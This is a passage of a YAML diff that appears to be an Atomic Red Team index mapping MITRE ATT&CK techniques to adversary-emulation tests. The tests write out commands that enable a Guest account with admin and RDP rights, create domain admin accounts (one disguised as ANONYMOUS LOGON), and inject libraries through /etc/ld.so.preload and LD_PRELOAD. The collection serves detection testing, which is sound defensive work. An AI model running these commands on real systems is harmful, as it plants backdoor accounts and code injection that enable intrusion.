mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.002 + url: https://attack.mitre.org/techniques/T1574/002 + - external_id: CAPEC-641 + source_name: capec + url: https://capec.mitre.org/data/definitions/641.html + - source_name: FireEye DLL Side-Loading + url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf + description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in + the Side of the Anti-Virus Industry. Retrieved March 13, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: DLL Side-Loading + description: |- + Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). + + Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) + id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor processes for unusual activity (e.g., a process that + does not use the network begins to do so) as well as the introduction of new + files/programs. Track DLL metadata, such as a hash, and compare DLLs that + are loaded at process execution time against previous executions to detect + differences that do not correlate with patching or updates. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + x_mitre_platforms: + - Windows + identifier: T1574.002 + atomic_tests: + - name: DLL Side-Loading using the Notepad++ GUP.exe binary + auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 + description: | + GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. + Upon execution, calc.exe will be opened. + supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: string + default: calculator.exe + gup_executable: + description: GUP is an open source signed binary used by Notepad++ for software + updates + type: path + default: PathToAtomicsFolder\T1574.002\bin\GUP.exe + dependency_executor_name: powershell + dependencies: + - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) + +' + prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" + executor: + command: "#{gup_executable}\n" + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + +' + name: command_prompt + T1078.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1078.001 + url: https://attack.mitre.org/techniques/T1078/001 + - external_id: CAPEC-70 + source_name: capec + url: https://capec.mitre.org/data/definitions/70.html + - source_name: Microsoft Local Accounts Feb 2019 + url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts + description: Microsoft. (2018, December 9). Local Accounts. Retrieved February + 11, 2019. + - source_name: AWS Root User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html + description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. + - source_name: Metasploit SSH Module + url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh + description: Metasploit. (n.d.). Retrieved April 12, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Default Accounts + description: |- + Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) + + Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) + id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-05T20:14:26.846Z' + created: '2020-03-13T20:15:31.974Z' + x_mitre_version: '1.2' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: Monitor whether default accounts have been activated or logged + into. These audits should also include checks on any appliances and applications + for default credentials or SSH keys, and if any are discovered, they should + be updated immediately. + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + - Containers + identifier: T1078.001 + atomic_tests: + - name: Enable Guest account with RDP capability and admin priviliges + auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 + description: After execution the Default Guest account will be enabled (Active) + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections + supported_platforms: + - windows + input_arguments: + guest_user: + description: Specify the guest account + type: String + default: guest + guest_password: + description: Specify the guest password + type: String + default: Password123! + executor: + command: |- + net user #{guest_user} /active:yes + net user #{guest_user} #{guest_password} + net localgroup administrators #{guest_user} /add + net localgroup "Remote Desktop Users" #{guest_user} /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f + cleanup_command: |- + net user #{guest_user} /active:no >nul 2>&1 + net localgroup administrators #{guest_user} /delete >nul 2>&1 + net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + name: command_prompt + elevation_required: true + T1136.002: + technique: + created: '2020-01-28T14:05:17.825Z' + modified: '2020-03-23T18:12:36.696Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177 + description: |- + Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account. + + Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. + name: Domain Account + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1136.002 + url: https://attack.mitre.org/techniques/T1136/002 + - source_name: Microsoft User Creation Event + description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account + was created. Retrieved June 30, 2017.' + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 + x_mitre_platforms: + - Windows + - macOS + - Linux + x_mitre_data_sources: + - 'User Account: User Account Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: 'Monitor for processes and command-line parameters associated + with domain account creation, such as net user /add /domain. + Collect data on account creation within a network. Event ID 4720 is generated + when a user account is created on a Windows domain controller. (Citation: + Microsoft User Creation Event) Perform regular audits of domain accounts to + detect suspicious accounts that may have been created by an adversary.' + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1136.002 + atomic_tests: + - name: Create a new Windows domain admin user + auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 + description: 'Creates a new domain admin user in a command prompt. + +' + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: T1136.002_Admin + password: + description: Password of the user to create + type: String + default: T1136_pass123! + group: + description: Domain administrator group to which add the user to + type: String + default: Domain Admins + executor: + command: | + net user "#{username}" "#{password}" /add /domain + net group "#{group}" "#{username}" /add /domain + cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + +' + name: command_prompt + elevation_required: false + - name: Create a new account similar to ANONYMOUS LOGON + auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 + description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. + +' + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: ANONYMOUS LOGON + password: + description: Password of the user to create + type: String + default: T1136_pass123! + executor: + command: 'net user "#{username}" "#{password}" /add /domain + +' + cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + +' + name: command_prompt + elevation_required: false + - name: Create a new Domain Account using PowerShell + auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 + description: 'Creates a new Domain User using the credentials of the Current + User + +' + supported_platforms: + - windows + input_arguments: + username: + description: Name of the Account to be created + type: String + default: T1136.002_Admin + password: + description: Password of the Account to be created + type: String + default: T1136_pass123! + executor: + command: | + $SamAccountName = '#{username}' + $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force + Add-Type -AssemblyName System.DirectoryServices.AccountManagement + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) + $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context) + $User.SamAccountName = $SamAccountName + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + $User.Enabled = $True + $User.PasswordNotRequired = $False + $User.DisplayName = $SamAccountName + $User.Save() + $User + cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + +' + name: powershell + elevation_required: false + T1078.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1078.002 + url: https://attack.mitre.org/techniques/T1078/002 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html + - url: https://technet.microsoft.com/en-us/library/dn535501.aspx + description: Microsoft. (2016, April 15). Attractive Accounts for Credential + Theft. Retrieved June 3, 2016. + source_name: TechNet Credential Theft + - source_name: Microsoft AD Accounts + url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts + description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved + March 13, 2020. + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Accounts + description: |- + Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) + + Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. + id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2020-09-16T19:42:11.787Z' + created: '2020-03-13T20:21:54.758Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1556.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.001 + url: https://attack.mitre.org/techniques/T1556/001 + - source_name: Dell Skeleton + description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. + Retrieved April 8, 2019. + url: https://www.secureworks.com/research/skeleton-key-malware-analysis + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Controller Authentication + description: "Adversaries may patch the authentication process on a domain controller + to bypass the typical authentication mechanisms and enable access to accounts. + \n\nMalware may be used to inject false credentials into the authentication + process on a domain controller with the intent of creating a backdoor used + to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). + Skeleton key works through a patch on an enterprise domain controller authentication + process (LSASS) with credentials that adversaries may use to bypass the standard + authentication system. Once patched, an adversary can use the injected password + to successfully authenticate as any domain user account (until the the skeleton + key is erased from memory by a reboot of the domain controller). Authenticated + access may enable unfettered access to hosts and/or resources within single-factor + authentication environments.(Citation: Dell Skeleton)" + id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:10:26.613Z' + created: '2020-02-11T19:05:02.399Z' + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + x_mitre_permissions_required: + - Administrator + x_mitre_detection: "Monitor for calls to OpenProcess that can be + used to manipulate lsass.exe running on a domain controller as well as for + malicious modifications to functions exported from authentication-related + system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure + robust, consistent account activity audit policies across the enterprise and + with externally accessible services.(Citation: TechNet Audit Policy) Look + for suspicious account behavior across systems that share accounts, either + user, admin, or service accounts. Examples: one account logged into multiple + systems simultaneously; multiple accounts logged into the same machine simultaneously; + accounts logged in at odd times or outside of business hours. Activity may + be from interactive login sessions or process ownership from accounts being + used to execute binaries on a remote system as a particular account. Correlate + other security systems with login information (e.g. a user has an active login + session but has not entered the building or does not have VPN access). " + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + atomic_tests: [] + T1574.004: + technique: + id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 + description: |- + Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. + + Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO) + name: Dylib Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.004 + url: https://attack.mitre.org/techniques/T1574/004 + - external_id: CAPEC-471 + source_name: capec + url: https://capec.mitre.org/data/definitions/471.html + - source_name: Wardle Dylib Hijack Vulnerable Apps + url: https://objective-see.com/blog/blog_0x46.html + description: Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore + Apps. Retrieved March 31, 2021. + - source_name: Wardle Dylib Hijacking OSX 2015 + url: https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf + description: Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved + March 29, 2021. + - source_name: Github EmpireProject HijackScanner + url: https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py + description: Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib + Hijack Vulnerability Scanner. Retrieved April 1, 2021. + - source_name: Github EmpireProject CreateHijacker Dylib + url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py + description: Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib + Hijacker. Retrieved April 1, 2021. + - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf + description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved + July 10, 2017. + source_name: Writing Bad Malware for OSX + - source_name: wardle artofmalware volume1 + url: https://taomm.org/vol1/pdfs.html + description: 'Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume + 0x1: Analysis. Retrieved March 19, 2021.' + - source_name: MalwareUnicorn macOS Dylib Injection MachO + url: https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 + description: Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. + Retrieved March 29, 2021. + - source_name: Apple Developer Doco Archive Run-Path + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html + description: Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved + March 31, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T20:19:15.212Z' + created: '2020-03-16T15:23:30.896Z' + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: "Monitor file systems for moving, renaming, replacing, or + modifying dylibs. Changes in the set of dylibs that are loaded by a process + (compared to past behavior) that do not correlate with known software, patches, + etc., are suspicious. Check the system for multiple dylibs with the same name + and monitor which versions have historically been loaded into a process. \n\nRun + path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, + and LC_RPATH. Other special keywords are recognized by the macOS + loader are @rpath, @loader_path, and @executable_path.(Citation: + Apple Developer Doco Archive Run-Path) These loader instructions can be examined + for individual binaries or frameworks using the otool -l command. + Objective-See's Dylib Hijacking Scanner can be used to identify applications + vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: + Github EmpireProject HijackScanner)" + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + x_mitre_defense_bypassed: + - Application control + atomic_tests: [] + T1574.006: + technique: + id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 + description: "Adversaries may execute their own malicious payloads by hijacking + environment variables the dynamic linker uses to load shared libraries. During + the execution preparation phase of a program, the dynamic linker loads specified + absolute paths of shared libraries from environment variables and files, such + as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES + on macOS. Libraries specified in environment variables are loaded first, taking + precedence over system libraries with the same function name.(Citation: Man + LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic + Libraries) These variables are often used by developers to debug binaries + without needing to recompile, deconflict mapped symbols, and implement custom + functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn + Linux and macOS, hijacking dynamic linker variables may grant access to the + victim process's memory, system/network resources, and possibly elevated privileges. + This method may also evade detection from security products since the execution + is masked under a legitimate process. Adversaries can set environment variables + via the command line using the export command, setenv + function, or putenv function. Adversaries can also leverage [Dynamic + Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export + variables in a shell or set variables programmatically using higher level + syntax such Python’s os.environ.\n\nOn Linux, adversaries may + set LD_PRELOAD to point to malicious libraries that match the + name of legitimate libraries which are requested by a victim program, causing + the operating system to load the adversary's malicious code upon execution + of the victim program. LD_PRELOAD can be set via the environment + variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: + TLDP Shared Libraries) Libraries specified by LD_PRELOAD are + loaded and mapped into memory by dlopen() and mmap() + respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed + Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) + \n\nOn macOS this behavior is conceptually the same as on Linux, differing + only in how the macOS dynamic libraries (dyld) is implemented at a lower level. + Adversaries can set the DYLD_INSERT_LIBRARIES environment variable + to point to malicious libraries containing names of legitimate libraries or + functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: + Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina + Bypass) " + name: Dynamic Linker Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.006 + url: https://attack.mitre.org/techniques/T1574/006 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html + - source_name: Man LD.SO + url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html + description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved + June 15, 2020. + - source_name: TLDP Shared Libraries + url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html + description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved + January 31, 2020. + - source_name: Apple Doco Archive Dynamic Libraries + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html + description: Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved + March 24, 2021. + - source_name: Baeldung LD_PRELOAD + url: https://www.baeldung.com/linux/ld_preload-trick-what-is + description: baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved + March 24, 2021. + - source_name: Code Injection on Linux and macOS + url: https://www.datawire.io/code-injection-on-linux-and-macos/ + description: 'Itamar Turner-Trauring. (2017, April 18). “This will only hurt + for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved + December 20, 2017.' + - url: http://hick.org/code/skape/papers/needle.txt + description: skape. (2003, January 19). Linux x86 run-time process manipulation. + Retrieved December 20, 2017. + source_name: Uninformed Needle + - url: http://phrack.org/issues/51/8.html + description: halflife. (1997, September 1). Shared Library Redirection Techniques. + Retrieved December 20, 2017. + source_name: Phrack halfdead 1997 + - source_name: Brown Exploiting Linkers + url: http://www.nth-dimension.org.uk/pub/BTL.pdf + description: 'Tim Brown. (2011, June 29). Breaking the links: Exploiting the + linker. Retrieved March 29, 2021.' + - source_name: TheEvilBit DYLD_INSERT_LIBRARIES + url: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/ + description: Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection + in macOS / OSX. Retrieved March 26, 2020. + - source_name: Timac DYLD_INSERT_LIBRARIES + url: https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/ + description: Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. + Retrieved March 26, 2020. + - source_name: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass + url: https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191 + description: Jon Gabilondo. (2019, September 22). How to Inject Code into + Mach-O Apps. Part II.. Retrieved March 24, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:18.453Z' + created: '2020-03-13T20:09:59.569Z' + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1574.006 + atomic_tests: + - name: Shared Library Injection via /etc/ld.so.preload + auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + description: "This test adds a shared library to the `ld.so.preload` list to + execute and intercept API calls. This technique was used by threat actor Rocke + during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon + successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. + \n" + supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' + +' + cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload + +' + name: bash + elevation_required: true + - name: Shared Library Injection via LD_PRELOAD + auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae + description: | + This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. + + Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. + supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'LD_PRELOAD=#{path_to_shared_library} ls + +' + name: bash + T1546.014: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.014 + url: https://attack.mitre.org/techniques/T1546/014 + - source_name: xorrior emond Jan 2018 + url: https://www.xorrior.com/emond-persistence/ + description: Ross, Chris. (2018, January 17). Leveraging Emond on macOS For + Persistence. Retrieved September 10, 2019. + - source_name: magnusviri emond Apr 2016 + url: http://www.magnusviri.com/Mac/what-is-emond.html + description: Reynolds, James. (2016, April 7). What is emond?. Retrieved September + 10, 2019. + - source_name: sentinelone macos persist Jun 2019 + url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ + description: Stokes, Phil. (2019, June 17). HOW MALWARE 